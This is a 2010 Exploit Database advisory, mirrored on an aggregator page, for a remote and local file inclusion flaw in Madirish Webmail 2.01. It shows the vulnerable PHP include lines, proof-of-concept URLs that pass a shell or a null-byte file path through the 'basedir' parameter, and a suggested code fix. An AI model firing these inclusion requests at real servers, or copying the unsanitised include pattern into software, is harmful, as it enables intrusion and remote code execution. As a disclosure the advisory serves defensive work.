Madirish Webmail 2.01 – ‘baseDir’ Local/Remote File Inclusion

• Exploit Database
• 108 阅读

• 作者： eidelweiss
  日期： 2010-04-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12369/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89

  ===================================================== Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability ===================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /&apos; \__/&apos;__<code>\/\ \__/&apos;__</code>\ 0 0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1 1\/_/\ \ /&apos; _ <code>\ \/\ \/_/_\_<_/&apos;___\ \ \/\ \ \ \ \/</code>&apos;__\0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1 1\ \____/ >> Exploit database separated by exploit 0 0 \/___/type (local, remote, DoS, etc.)1 11 0[+] Site: Inj3ct0r.com0 1[+] Support e-mail: submit[at]inj3ct0r.com1 00 1########################################1 0I&apos;m eidelweiss member from Inj3ct0r Team1 1########################################0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Download: http://sourceforge.net/projects/madirishwebmail/files/madirish_webmail/2.01/Madirish_Webmail.tgz/download Author: eidelweiss Contact: eidelweiss[at]cyberservices.com Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber sp3x (securityreason) And All Friends. Successful exploitation requires that "register_globals" is enabled. ======================================================================== Description: Madirish Webmail is a PHP based email agent (with an Address Book and Calendar) primarily used to access a POP3 account via the web. The system uses MySQL and PHP, and while developed for Linux, will probably work on other platforms. ======================================================================== -=[ VULN C0de ]=-   There is a vulnerability in almost every file directory , for example in this Directory file:   [-] Madirish_Webmail/lib/addressbook.php   */ require_once($basedir."lib/sql.php"); require_once($basedir."lib/html.php");   ************************************************* [!]This other sample vuln c0de which affected to LFI [!] *************************************************   [-] Madirish_Webmail/index.php   */ require_once ("inc/config.php"); //<= 1 require_once ($basedir."lib/html.php"); require_once ($basedir."lib/common.php"); //<=2 ======================================================================== -=[ P0C RFI ]=-   http://127.0.0.1/Madirish_Webmail/lib/addressbook.php?basedir= [sh3ll inj3ct0r]   -=[ P0C LFI ]=-   http://127.0.0.1/Madirish_Webmail/index.php?basedir= [LFI]%00   etc, etc, etc   ========================================================================   NB: There is a vulnerability in almost every file directory of Madirish Webmail v2.01. Vendor fix the vulnerability in version 2.0 and update to v2.0.1 But vendor not perfectly fix the vulnerability , they just edit the code to handle Remote file inclusions, but as we see still have RFI vulnerability and now i see possible LFI there.   Solution: Fix / Edit the code or update to new version if available, Example:   */ require_once($basedir."lib/sql.php"); // change into require_once("Madirish_Webmail/lib/sql.php"); require_once($basedir."lib/html.php"); // change into require_once("Madirish_Webmail/lib/html.php");   =========================| -=[ E0F ]=- |=================================